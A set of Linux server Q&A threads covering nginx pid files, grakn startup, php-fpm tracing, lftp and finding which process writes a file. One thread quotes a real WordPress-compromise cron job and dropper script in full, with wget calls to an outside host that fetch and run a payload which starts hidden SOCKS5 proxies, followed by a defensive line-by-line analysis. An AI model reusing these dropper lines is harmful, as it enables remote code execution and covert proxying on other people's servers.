I lost nginx.pid, it disappeared - nginx

Here is part of my nginx.conf:
pid /www/nginx0836/nginx.pid;
When I restart nginx and run ls /www/nginx0836 within a few seconds, nginx.pid is listed.
But after several more seconds, running ls /www/nginx0836 again, nginx.pid is no longer listed.
Why?
By the way, the nginx server works fine, and when I run
ps -ef | grep "nginx: master process" | grep -v "grep" | awk -F ' ' '{print $2}'
I can see the nginx master process pid.

Try monitoring the folder with incrond and logging any changes on that directory with $# $#; maybe you will see something like puppet or an rsync job deleting the pid file.
/www/nginx0836 IN_DELETE echo "$# $#"
This will log any delete event on the directory. It is simpler than using audit.
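For reference, a slightly fuller incrontab entry could look like the one below. This is only an illustrative sketch: the IN_MOVED_FROM mask and the use of logger are my additions; $@, $# and $% are incron's wildcards for the watched directory, the file name and the event type.
/www/nginx0836 IN_DELETE,IN_MOVED_FROM logger incron: $@/$# $%
Every deletion (or move-out) of a file in that directory then shows up in syslog with its name and timestamp, which you can correlate with cron jobs, puppet runs, log rotation and the like.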

Try the default configuration for nginx; you will find a similar problem described here.

Not able to start grakn, Storage is not able to start

I have installed grakn on unix. Earlier it was working fine, but now it is giving issues as it is not able to start.
I tried to run it using the command below:
./grakn server start
I get the error below:
Starting Storage-FAILED!
Unable to start Storage
Please run 'grakn server status' or check the logs located under 'logs' directory.
There may be a lot of things happening under the hood. Without looking at the logs it is hard to tell exactly what is happening. You can try killing all the grakn processes and then removing the associated pid files from the /tmp/ directory. Then retry starting the grakn server.
$ for KILLPID in `ps ax | grep 'grakn' | grep -v grep | awk '{print $1}'`; do kill -9 $KILLPID; done
$ ps -ef | grep defunct | grep -v grep | cut -b8-20 | xargs kill -9
$ rm -rf /tmp/grakn-*
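If pkill is available, the first loop can be collapsed into a single command; this is just an equivalent shortcut, not part of the original steps:
$ pkill -9 -f grakn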
Let me know if it helps.

some malware that appeared on our site related to the recent wordpress attack

Apparently a site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited a vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
The file it was pulling is this (obviously, don't try to execute it):
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, it kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar, untars it (creating the /tmp/stest directory), deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl, which can be downloaded from sourceforge. The version used here differs from the sourceforge version in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script rather than passed in on the command line. I suspect that the purpose of the latter change is to make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax for that command. If you find it, use the kill command to stop it.
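For example, something like this should list any leftover instance (the brackets in the pattern just keep grep from matching its own process); you can then pass the printed PID to kill:
ps wax | grep '[p]erl httpd'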

How to debug php-fpm performance?

Web pages are loading very slowly; it takes around 6 seconds before the server even starts sending the page data, which is then transferred in a matter of 0.2 seconds and generated in 0.19 seconds.
I doubt that it is caused by php or the browser, so the problem must be with the server, which is handled by nginx and php5-fpm.
A server admin said that the problem was indeed caused by a misconfigured fpm or nginx.
How can I debug the cause of the slowdown?
Setup: php5.3, mysql5, linux, nginx, php5-fpm
This question is probably too broad for StackOverflow, as a full answer could span several pages and topics.
However, if the question were just how to debug the performance of PHP-FPM, then the answer would be much easier: use strace and the script below.
#!/bin/bash
mkdir -p trc
rm -rf trc/*.trc
additional_strace_args="$1"
MASTER_PID=$(ps auwx | grep php-fpm | grep -v grep | grep 'master process' | cut -d ' ' -f 7)
summarise=""
#shows total of calls - comment in to get
#summarise="-c"
nohup strace -r $summarise -p $MASTER_PID -ff -o ./trc/master.follow.trc >"trc/master.$MASTER_PID.trc" 2>&1 &
while read -r pid;
do
    if [[ $pid != $MASTER_PID ]]; then
        #shows total of calls
        nohup strace -r $summarise -p "$pid" $additional_strace_args >"trc/$pid.trc" 2>&1 &
    fi
done < <(pgrep php-fpm)
read -p "Strace running - press [Enter] to stop"
pkill strace
That script will attach strace to all of the running php-fpm instances. Any requests to the web server that reach php-fpm will have all of their system calls logged, which lets you inspect which ones are taking the most time and so figure out what needs optimising first.
On the other hand, if you can see from the strace output that PHP-FPM is processing each request quickly, that lets you eliminate it as the problem and investigate nginx instead, along with how nginx is talking to PHP-FPM, which could also be the problem.
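One quick way to skim the results, assuming the line format produced by strace -r above (each line prefixed with the time since the previous call), is to sort each per-PID trace by that first column so the slowest calls float to the top:
for f in trc/*.trc; do echo "== $f"; sort -rn "$f" | head; done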
@Danack saved my life.
But I had to change the command to get the MASTER_PID:
MASTER_PID=$(ps auwx | grep php-fpm | grep -v grep | grep 'master process' | sed -e 's/ \+/ /g' | cut -d ' ' -f 2)
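If pgrep is available, another option (my suggestion rather than part of the answers above) is to skip parsing ps output altogether and match the master process by its command line:
MASTER_PID=$(pgrep -o -f 'php-fpm: master process')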

ls filename does not work in lftp

I created an lftp script to upload single files to a web hosting provider.
The use case is that I call it from the repository root, so the relative path is the same here and on the remote server.
#!/bin/bash
DIRNAME=$(dirname "$1")
FILENAME=$(basename "$1")
REPO_ROOT=$(pwd)
ABSOLUTE_PATH=${REPO_ROOT}/$1
lftp -u user,passwd -p port sftp://user@hosting <<EOF
cd $DIRNAME
put $ABSOLUTE_PATH
ls -l $FILENAME
quit 0
EOF
It works, with one small but annoying bug. To check that it really uploads the file, I have put an ls -l at the end. It fails and I do not understand why:
ls: Access failed: No such file(functions.php)
I tried to use rels and cache flush but in vain. I'm using lftp 4.0.9.
Some googling at last turned up an answer in a mail-archive post:
It is a limitation of SFTP protocol implementation in lftp. It cannot
list a single file, only a specific directory.
Fortunately, lftp allows pipes, so
ls -l | grep "$FILENAME"
solves the problem.
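With that change, the tail of the heredoc in the script above becomes (same variables as before; only the failing ls -l $FILENAME line changes):
cd $DIRNAME
put $ABSOLUTE_PATH
ls -l | grep "$FILENAME"
quit 0
EOF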

How to identify which Daemon Process is writing to the file

I need to identify a daemon process that is writing to a log file periodically. The problem is that I don't have any idea which process is doing the job, and I need to show some progress to the client by tomorrow. Does anybody have a clue?
I have already sorted out the daemon processes running on the system with the help of the PPID. Any help would be appreciated.
Also, I think it is possible (rarely) for a daemon not to have a PPID of 1. How can we find it in that case?
Try the fuser command on your log file, which will display the PIDs of processes using it.
Example:
$ fuser file.log
file.log: 3065
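To see which command that PID belongs to, you can feed it straight to ps (3065 is just the PID from the example above):
$ ps -p 3065 -o pid,ppid,comm,args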
lsof gives a list of open files together with the processes that have them open.
So lsof | grep <filename> should help you.
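lsof can also be pointed at the file directly, which avoids the grep, as long as the file is actually open at that moment:
$ lsof /path/to/file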
You can use auditctl.
# sudo apt-get install auditd
# sudo /sbin/auditctl -w /path/to/file -p war -k hosts-file
-w /path/to/file is the file to watch
-p war watches for write, attribute change, and read events
-k hosts-file is a search key.
# sudo /sbin/ausearch -f /path/to/file | more
Gives output such as
type=UNKNOWN[1327] msg=audit(1459766547.822:130): proctitle=2F7573722F7362696E2F61706163686532002D6B007374617274
type=PATH msg=audit(1459766547.822:130): item=0 name="/path/to/file" inode=141561 dev=08:00 mode=0100444 ouid=33 ogid=33 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1459766547.822:130): cwd="/"
type=SYSCALL msg=audit(1459766547.822:130): arch=c000003e syscall=2 success=yes exit=41 a0=7f3c23034cd0 a1=80000 a2=1b6 a3=8 items=1 ppid=24452 pid=6797 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key="hosts-file"
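As a side note, the proctitle field is hex-encoded. If you want it human-readable, one option (assuming xxd is available) is:
$ echo 2F7573722F7362696E2F61706163686532002D6B007374617274 | xxd -r -p | tr '\0' ' '
/usr/sbin/apache2 -k start
which matches the exe="/usr/sbin/apache2" shown in the same record, i.e. apache2 is the process touching the file in this example.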
